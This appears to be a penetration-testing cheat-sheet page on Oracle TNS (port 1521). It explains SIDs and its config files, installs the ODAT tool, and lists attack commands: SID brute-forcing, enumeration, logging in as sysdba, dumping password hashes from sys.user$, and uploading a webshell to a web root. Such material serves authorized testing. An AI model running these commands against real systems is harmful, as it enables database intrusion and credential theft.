Oracle TNS (1521)

Oracle Transparent Network Substrate.

Protocol Information

Oracle TNS is a communication protocol that facilitates communication between Oracle databases and applications via networks. Oracle TNS is often used with other Oracle services such as Oracle DBSNMP, Oracle Databases, Oracle Application Server, Oracle Enterprise Manager, Oracle Fusion Middleware, Web servers, and many others. It provides security through the application of different levels of encryption and error reporting and logging capability.

In Oracle RDBMS, a System Identifier (SID) is a unique name that identifies a particular database instance. In fact, a database can have multiple instances, each with its own System ID. Ex. In an Oracle RAC environment, a single physical database is accessible from multiple Oracle instances, spread across different nodes in a cluster. Each instance has its own unique SID, but all instances share the same set of database files. This configuration is used to provide scalability and high availability. SIDs are an essential part of the connection process, as they identify the specific database instance to which the client wishes to connect.

Port

1521 TCP	Oracle TNS

Config File

In $ORACLE_HOME/network/admin/:

• tnsnames.ora : Each database or service has a unique entry in the tnsnames.ora file, containing the information necessary for clients to connect to the service. The entry consists of a name for the service, the network location of the service, and the name of the database or service that clients must use when connecting to the service. In other words, it resolves service names into network addresses, telling clients how to find the databases.

• listener.ora : Is a server-side configuration file that defines the properties and parameters of the listening process, which is responsible for receiving incoming client requests and forwarding them to the appropriate Oracle database instance. In other words, it configures the listener, which is the program that sits on the server and listens for connection requests from clients, telling the server how to listen for client requests.

Interact

Installation of the necessary tools

#!/bin/bash

sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH
export PATH=$LD_LIBRARY_PATH:$PATH
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor passlib python-libnmap
sudo apt-get install build-essential libgmp-dev -y
pip3 install pycryptodome

Documentation HERE.

sqlplus <USERNAME>/<PASSWORD>@<IP>/<SID>

> select table_name from all_tables;
> select * from user_role_privs;
> select name, password from sys.user$;

If you have an error with sqlplus

export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib:$ORACLE_HOME
# or
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig

Attacks

SID Bruteforcing

Nmap NSE: --script oracle-sid-brute

Enumeration with odat.

./odat.py all -s <IP>

PrivEsc to sysdba

sqlplus <USERNAME>/<PASSWORD>@<IP>/<SID> as sysdba

> select * from user_role_privs;
> select name, password from sys.user$;

Upload webshell to website (if present) with odat.

./odat.py utlfile -s <IP> -d <SID> -U <USER> -P <PASS> --sysdba --putFile <PATH> <NameFileOnServer> ./<myFile>
# ex. <PATH> : C:\\inetpub\\wwwroot